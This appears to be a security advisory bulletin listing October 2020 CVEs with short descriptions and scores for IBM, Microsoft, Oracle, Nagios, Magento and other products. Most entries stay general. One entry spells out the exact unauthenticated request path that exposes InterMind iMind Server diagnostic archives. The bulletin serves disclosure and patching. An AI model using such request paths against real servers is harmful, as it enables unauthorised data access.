ibm — sterling_b2b_integrator IBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 6.0.2.2 is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 171733. 2020-10-20 6.5 CVE-2019-4680
XF
CONFIRM
infinispan — infinispan A flaw was found in Infinispan version 10, where it permits local access to controls via both REST and HotRod APIs. This flaw allows a user authenticated to the local machine to perform all operations on the caches, including the creation, update, deletion, and shutdown of the entire server. 2020-10-19 5.6 CVE-2020-10746
MISC
libass_project — libass In libass 0.14.0, the `ass_outline_construct`’s call to `outline_stroke` causes a signed integer overflow. 2020-10-16 6.8 CVE-2020-26682
MISC
MISC
magento — magento Magento versions 2.4.0 and 2.3.5p1 (and earlier) are affected by a persistent XSS vulnerability that allows users to upload malicious JavaScript via the file upload component. This vulnerability could be abused by an unauthenticated attacker to execute XSS attacks against other Magento users. This vulnerability requires a victim to browse to the uploaded file. 2020-10-16 4.3 CVE-2020-24408
MISC
microsoft — .net_framework An information disclosure vulnerability exists when the .NET Framework improperly handles objects in memory, aka ‘.NET Framework Information Disclosure Vulnerability’. 2020-10-16 4.3 CVE-2020-16937
MISC
microsoft — 365_apps A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka ‘Microsoft Excel Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16929, CVE-2020-16930, CVE-2020-16931. 2020-10-16 6.8 CVE-2020-16932
MISC
MISC
microsoft — 365_apps A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka ‘Microsoft Excel Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16929, CVE-2020-16931, CVE-2020-16932. 2020-10-16 6.8 CVE-2020-16930
MISC
MISC
MISC
microsoft — 365_apps A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka ‘Microsoft Excel Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16930, CVE-2020-16931, CVE-2020-16932. 2020-10-16 6.8 CVE-2020-16929
MISC
MISC
microsoft — 365_apps An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files, aka ‘Microsoft Office Click-to-Run Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16928, CVE-2020-16934. 2020-10-16 6.8 CVE-2020-16955
MISC
microsoft — 365_apps An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files, aka ‘Microsoft Office Click-to-Run Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16928, CVE-2020-16955. 2020-10-16 6.8 CVE-2020-16934
MISC
microsoft — 365_apps An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files, aka ‘Microsoft Office Click-to-Run Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16934, CVE-2020-16955. 2020-10-16 6.8 CVE-2020-16928
MISC
microsoft — 365_apps A remote code execution vulnerability exists in Microsoft Office software when the software fails to properly handle objects in memory, aka ‘Microsoft Office Remote Code Execution Vulnerability’. 2020-10-16 6.8 CVE-2020-16954
MISC
microsoft — 365_apps A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka ‘Microsoft Excel Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16929, CVE-2020-16930, CVE-2020-16932. 2020-10-16 6.8 CVE-2020-16931
MISC
MISC
microsoft — exchange_server An information disclosure vulnerability exists in how Microsoft Exchange validates tokens when handling certain messages, aka ‘Microsoft Exchange Information Disclosure Vulnerability’. 2020-10-16 4.3 CVE-2020-16969
MISC
microsoft — sharepoint_enterprise_server An information disclosure vulnerability exists when Microsoft SharePoint Server fails to properly handle objects in memory, aka ‘Microsoft SharePoint Information Disclosure Vulnerability’. This CVE ID is unique from CVE-2020-16941, CVE-2020-16942, CVE-2020-16948, CVE-2020-16950. 2020-10-16 4 CVE-2020-16953
MISC
microsoft — sharepoint_enterprise_server A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka ‘Microsoft SharePoint Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16951. 2020-10-16 6.8 CVE-2020-16952
MISC
MISC
microsoft — sharepoint_enterprise_server An information disclosure vulnerability exists when Microsoft SharePoint Server fails to properly handle objects in memory, aka ‘Microsoft SharePoint Information Disclosure Vulnerability’. This CVE ID is unique from CVE-2020-16941, CVE-2020-16942, CVE-2020-16950, CVE-2020-16953. 2020-10-16 4 CVE-2020-16948
MISC
microsoft — sharepoint_enterprise_server A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka ‘Microsoft SharePoint Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16952. 2020-10-16 6.8 CVE-2020-16951
MISC
microsoft — sharepoint_server An information disclosure vulnerability exists when Microsoft SharePoint Server fails to properly handle objects in memory, aka ‘Microsoft SharePoint Information Disclosure Vulnerability’. This CVE ID is unique from CVE-2020-16941, CVE-2020-16942, CVE-2020-16948, CVE-2020-16953. 2020-10-16 4.3 CVE-2020-16950
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Backup Service Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16912, CVE-2020-16936, CVE-2020-16972, CVE-2020-16974, CVE-2020-16975, CVE-2020-16976. 2020-10-16 4.6 CVE-2020-16973
MISC
microsoft — windows_10 A remote code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory, aka ‘Microsoft Windows Codecs Library Remote Code Execution Vulnerability’. 2020-10-16 6.8 CVE-2020-17022
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists when Group Policy improperly checks access, aka ‘Group Policy Elevation of Privilege Vulnerability’. 2020-10-16 4.6 CVE-2020-16939
MISC
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Backup Service Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16912, CVE-2020-16936, CVE-2020-16973, CVE-2020-16974, CVE-2020-16975, CVE-2020-16976. 2020-10-16 4.6 CVE-2020-16972
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Backup Service Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16936, CVE-2020-16972, CVE-2020-16973, CVE-2020-16974, CVE-2020-16975, CVE-2020-16976. 2020-10-16 4.6 CVE-2020-16912
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Backup Service Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16912, CVE-2020-16936, CVE-2020-16972, CVE-2020-16973, CVE-2020-16975, CVE-2020-16976. 2020-10-16 4.6 CVE-2020-16974
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Backup Service Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16912, CVE-2020-16936, CVE-2020-16972, CVE-2020-16973, CVE-2020-16974, CVE-2020-16976. 2020-10-16 4.6 CVE-2020-16975
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files, aka ‘Windows Error Reporting Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16909. 2020-10-16 4.6 CVE-2020-16905
MISC
microsoft — windows_10 A security feature bypass vulnerability exists when Microsoft Windows fails to handle file creation permissions, which could allow an attacker to create files in a protected Unified Extensible Firmware Interface (UEFI) location.To exploit this vulnerability, an attacker could run a specially crafted application to bypass Unified Extensible Firmware Interface (UEFI) variable security in Windows.The security update addresses the vulnerability by correcting security feature behavior to enforce permissions., aka ‘Windows Security Feature Bypass Vulnerability’. 2020-10-16 4.3 CVE-2020-16910
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Backup Service Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16912, CVE-2020-16936, CVE-2020-16972, CVE-2020-16973, CVE-2020-16974, CVE-2020-16975. 2020-10-16 4.6 CVE-2020-16976
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists when the Windows Application Compatibility Client Library improperly handles registry operations, aka ‘Windows Application Compatibility Client Library Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16876. 2020-10-16 4.6 CVE-2020-16920
MISC
microsoft — windows_10 A remote code execution vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets, aka ‘Windows TCP/IP Remote Code Execution Vulnerability’. 2020-10-16 5.8 CVE-2020-16898
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files, aka ‘Windows Error Reporting Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16905. 2020-10-16 4.6 CVE-2020-16909
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists when the Windows Application Compatibility Client Library improperly handles registry operations, aka ‘Windows Application Compatibility Client Library Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16920. 2020-10-16 4.6 CVE-2020-16876
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Backup Service Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16912, CVE-2020-16972, CVE-2020-16973, CVE-2020-16974, CVE-2020-16975, CVE-2020-16976. 2020-10-16 4.6 CVE-2020-16936
MISC
microsoft — windows_10 A denial of service vulnerability exists when Microsoft Hyper-V on a host server fails to properly validate specific malicious data from a user on a guest operating system.To exploit the vulnerability, an attacker who already has a privileged account on a guest operating system, running as a virtual machine, could run a specially crafted application.The security update addresses the vulnerability by resolving the conditions where Hyper-V would fail to handle these requests., aka ‘Windows Hyper-V Denial of Service Vulnerability’. 2020-10-16 4.6 CVE-2020-1243
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists when the Windows Storage Services improperly handle file operations, aka ‘Windows Storage Services Elevation of Privilege Vulnerability’. 2020-10-16 4.6 CVE-2020-0764
MISC
microsoft — windows_10 A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory, aka ‘Microsoft Graphics Components Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-1167. 2020-10-16 6.8 CVE-2020-16923
MISC
microsoft — windows_10 A remote code execution vulnerability exists when Windows Network Address Translation (NAT) fails to properly handle UDP traffic, aka ‘Windows NAT Remote Code Execution Vulnerability’. 2020-10-16 6.8 CVE-2020-16894
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists when the Windows User Profile Service (ProfSvc) improperly handles junction points, aka ‘Windows – User Profile Service Elevation of Privilege Vulnerability’. 2020-10-16 4.9 CVE-2020-16940
MISC
MISC
microsoft — windows_10 An information disclosure vulnerability exists in Remote Desktop Protocol (RDP) when an attacker connects to the target system using RDP and sends specially crafted requests, aka ‘Windows Remote Desktop Protocol (RDP) Information Disclosure Vulnerability’. 2020-10-16 5 CVE-2020-16896
MISC
microsoft — windows_10 A denial of service vulnerability exists in Microsoft Outlook software when the software fails to properly handle objects in memory, aka ‘Microsoft Outlook Denial of Service Vulnerability’. 2020-10-16 5 CVE-2020-16949
MISC
microsoft — windows_10 A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory, aka ‘Media Foundation Memory Corruption Vulnerability’. 2020-10-16 6.8 CVE-2020-16915
MISC
MISC
microsoft — windows_10 A security feature bypass vulnerability exists in Microsoft Word software when it fails to properly handle .LNK files, aka ‘Microsoft Word Security Feature Bypass Vulnerability’. 2020-10-16 6.8 CVE-2020-16933
MISC
microsoft — windows_server_2012 An elevation of privilege vulnerability exists when the Windows iSCSI Target Service improperly handles file operations, aka ‘Windows iSCSI Target Service Elevation of Privilege Vulnerability’. 2020-10-16 4.6 CVE-2020-16980
MISC
mind — imind_server InterMind iMind Server through 3.13.65 allows remote unauthenticated attackers to read the self-diagnostic archive via a direct api/rs/monitoring/rs/api/system/dump-diagnostic-info?server=127.0.0.1 request. 2020-10-20 5 CVE-2020-24765
MISC
mozilla — network_security_services A flaw was found in the way NSS handled CCS (ChangeCipherSpec) messages in TLS 1.3. This flaw allows a remote attacker to send multiple CCS messages, causing a denial of service for servers compiled with the NSS library. The highest threat from this vulnerability is to system availability. This flaw affects NSS versions before 3.58. 2020-10-20 5 CVE-2020-25648
MISC
MISC
nagios — nagios_xi Improper neutralization of argument delimiters in a command in Nagios XI 5.7.3 allows a remote, authenticated admin user to write to arbitrary files and ultimately execute code with the privileges of the apache user. 2020-10-20 6.5 CVE-2020-5792
MISC
nagios — nagios_xi Cross-site request forgery in Nagios XI 5.7.3 allows a remote attacker to perform sensitive application actions by tricking legitimate users into clicking a crafted link. 2020-10-20 4.3 CVE-2020-5790
MISC
olimpoks — olimpok OLIMPOKS under 3.3.39 allows Auth/Admin ErrorMessage XSS. Remote Attacker can use discovered vulnerability to inject malicious JavaScript payload to victim’s browsers in context of vulnerable applications. Executed code can be used to steal administrator’s cookies, influence HTML content of targeted application and perform phishing-related attacks. Vulnerable application used in more than 3000 organizations in different sectors from retail to industries. 2020-10-16 4.3 CVE-2020-16270
MISC
MISC
MISC
oracle — application_express Vulnerability in the Oracle Application Express Data Reporter component of Oracle Database Server. The supported version that is affected is Prior to 20.2. Easily exploitable vulnerability allows low privileged attacker having Valid User Account privilege with network access via HTTP to compromise Oracle Application Express Data Reporter. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Application Express Data Reporter, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Application Express Data Reporter accessible data as well as unauthorized read access to a subset of Oracle Application Express Data Reporter accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N). 2020-10-21 4.9 CVE-2020-14899
MISC
oracle — application_express Vulnerability in the Oracle Application Express Group Calendar component of Oracle Database Server. The supported version that is affected is Prior to 20.2. Easily exploitable vulnerability allows low privileged attacker having Valid User Account privilege with network access via HTTP to compromise Oracle Application Express Group Calendar. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Application Express Group Calendar, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Application Express Group Calendar accessible data as well as unauthorized read access to a subset of Oracle Application Express Group Calendar accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N). 2020-10-21 4.9 CVE-2020-14900
MISC
oracle — application_express Vulnerability in the Oracle Application Express component of Oracle Database Server. The supported version that is affected is Prior to 20.2. Easily exploitable vulnerability allows low privileged attacker having SQL Workshop privilege with network access via HTTP to compromise Oracle Application Express. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Application Express, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Application Express accessible data as well as unauthorized read access to a subset of Oracle Application Express accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N). 2020-10-21 4.9 CVE-2020-14762
MISC
oracle — application_express Vulnerability in the Oracle Application Express Packaged Apps component of Oracle Database Server. The supported version that is affected is Prior to 20.2. Easily exploitable vulnerability allows low privileged attacker having Valid User Account privilege with network access via HTTP to compromise Oracle Application Express Packaged Apps. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Application Express Packaged Apps, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Application Express Packaged Apps accessible data as well as unauthorized read access to a subset of Oracle Application Express Packaged Apps accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N). 2020-10-21 4.9 CVE-2020-14898
MISC
oracle — application_express Vulnerability in the Oracle Application Express Quick Poll component of Oracle Database Server. The supported version that is affected is Prior to 20.2. Easily exploitable vulnerability allows low privileged attacker having Valid User Account privilege with network access via HTTP to compromise Oracle Application Express Quick Poll. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Application Express Quick Poll, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Application Express Quick Poll accessible data as well as unauthorized read access to a subset of Oracle Application Express Quick Poll accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N). 2020-10-21 4.9 CVE-2020-14763
MISC
oracle — applications_framework Vulnerability in the Oracle Applications Framework product of Oracle E-Business Suite (component: Popup windows). Supported versions that are affected are 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Applications Framework. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Applications Framework, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data. CVSS 3.1 Base Score 4.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N). 2020-10-21 5.8 CVE-2020-14746
MISC
oracle — applications_manager Vulnerability in the Oracle Applications Manager product of Oracle E-Business Suite (component: AMP EBS Integration). Supported versions that are affected are 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Applications Manager. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Applications Manager accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N). 2020-10-21 5 CVE-2020-14811
MISC
oracle — applications_manager Vulnerability in the Oracle Applications Manager product of Oracle E-Business Suite (component: SQL Extensions). Supported versions that are affected are 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Applications Manager. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Applications Manager accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N). 2020-10-21 5 CVE-2020-14826
MISC
oracle — applications_manager Vulnerability in the Oracle Applications Manager product of Oracle E-Business Suite (component: Oracle Diagnostics Interfaces). Supported versions that are affected are 12.1.3 and 12.2.3 – 12.2.7. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Applications Manager. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Manager accessible data as well as unauthorized read access to a subset of Oracle Applications Manager accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N). 2020-10-21 6.4 CVE-2020-14761
MISC
oracle — banking_corporate_lending Vulnerability in the Oracle Banking Corporate Lending product of Oracle Financial Services Applications (component: Core). Supported versions that are affected are 12.3.0 and 14.0.0-14.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Banking Corporate Lending. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Banking Corporate Lending accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N). 2020-10-21 6.8 CVE-2020-14894
MISC
oracle — banking_payments Vulnerability in the Oracle Banking Payments product of Oracle Financial Services Applications (component: Core). Supported versions that are affected are 14.1.0-14.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Banking Payments. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Banking Payments accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N). 2020-10-21 6.8 CVE-2020-14896
MISC
oracle — business_intelligence Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Actions). Supported versions that are affected are 5.5.0.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Business Intelligence Enterprise Edition, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N). 2020-10-21 5.8 CVE-2020-14815
MISC
oracle — business_intelligence Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Web Administration). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 7.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N). 2020-10-21 5.5 CVE-2020-14766
MISC
oracle — core_rdbms Vulnerability in the Core RDBMS component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c. Easily exploitable vulnerability allows high privileged attacker having SYSDBA level account privilege with network access via Oracle Net to compromise Core RDBMS. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Core RDBMS accessible data. CVSS 3.1 Base Score 2.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N). 2020-10-21 5.5 CVE-2020-14742
MISC
oracle — customer_relationship_management_technical_foundation Vulnerability in the Oracle CRM Technical Foundation product of Oracle E-Business Suite (component: Preferences). Supported versions that are affected are 12.2.3 – 12.2.10. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle CRM Technical Foundation. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle CRM Technical Foundation accessible data as well as unauthorized access to critical data or complete access to all Oracle CRM Technical Foundation accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N). 2020-10-21 5.5 CVE-2020-14823
MISC
oracle — database Vulnerability in the RDBMS Security component of Oracle Database Server. The supported version that is affected is 19c. Easily exploitable vulnerability allows high privileged attacker having Analyze Any privilege with network access via Oracle Net to compromise RDBMS Security. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all RDBMS Security accessible data. CVSS 3.1 Base Score 4.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N). 2020-10-21 6.8 CVE-2020-14901
MISC
oracle — database_filesystem Vulnerability in the Database Filesystem component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2 and 12.2.0.1. Easily exploitable vulnerability allows high privileged attacker having Resource, Create Table, Create View, Create Procedure, Dbfs_role privilege with network access via Oracle Net to compromise Database Filesystem. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Database Filesystem. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 6.8 CVE-2020-14741
MISC
oracle — database_vault Vulnerability in the Database Vault component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2 and 12.2.0.1. Easily exploitable vulnerability allows high privileged attacker having Create Public Synonym privilege with network access via Oracle Net to compromise Database Vault. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Database Vault accessible data as well as unauthorized read access to a subset of Database Vault accessible data. CVSS 3.1 Base Score 3.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N). 2020-10-21 6.5 CVE-2020-14736
MISC
oracle — e-business_suite_secure_enterprise_search Vulnerability in the Oracle E-Business Suite Secure Enterprise Search product of Oracle E-Business Suite (component: Search Integration Engine). Supported versions that are affected are 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle E-Business Suite Secure Enterprise Search. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle E-Business Suite Secure Enterprise Search accessible data as well as unauthorized access to critical data or complete access to all Oracle E-Business Suite Secure Enterprise Search accessible data. CVSS 3.1 Base Score 9.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N). 2020-10-21 6.4 CVE-2020-14805
MISC
oracle — flexcube_universal_banking Vulnerability in the Oracle FLEXCUBE Universal Banking product of Oracle Financial Services Applications (component: Infrastructure). Supported versions that are affected are 12.3.0 and 14.0.0-14.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle FLEXCUBE Universal Banking. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle FLEXCUBE Universal Banking accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N). 2020-10-21 6.8 CVE-2020-14887
MISC
oracle — graalvm Vulnerability in the Java SE product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 11.0.8 and 15. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N). 2020-10-21 5 CVE-2020-14803
CONFIRM
MISC
oracle — hospitality_suite Vulnerability in the Oracle Hospitality Suite8 product of Oracle Hospitality Applications (component: WebConnect). Supported versions that are affected are 8.10.2 and 8.11-8.15. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Hospitality Suite8. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Hospitality Suite8 accessible data as well as unauthorized update, insert or delete access to some of Oracle Hospitality Suite8 accessible data. CVSS 3.1 Base Score 7.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N). 2020-10-21 5.8 CVE-2020-14807
MISC
oracle — hospitality_suite8 Vulnerability in the Oracle Hospitality Suite8 product of Oracle Hospitality Applications (component: WebConnect). Supported versions that are affected are 8.10.2 and 8.11-8.15. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Hospitality Suite8. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Hospitality Suite8 accessible data as well as unauthorized read access to a subset of Oracle Hospitality Suite8 accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N). 2020-10-21 5.8 CVE-2020-14810
MISC
oracle — hyperion_lifecycle_management Vulnerability in the Hyperion Lifecycle Management product of Oracle Hyperion (component: Shared Services). The supported version that is affected is 11.1.2.4. Difficult to exploit vulnerability allows high privileged attacker with network access via HTTP to compromise Hyperion Lifecycle Management. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Hyperion Lifecycle Management accessible data. CVSS 3.1 Base Score 4.2 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:H/A:N). 2020-10-21 4.9 CVE-2020-14752
MISC
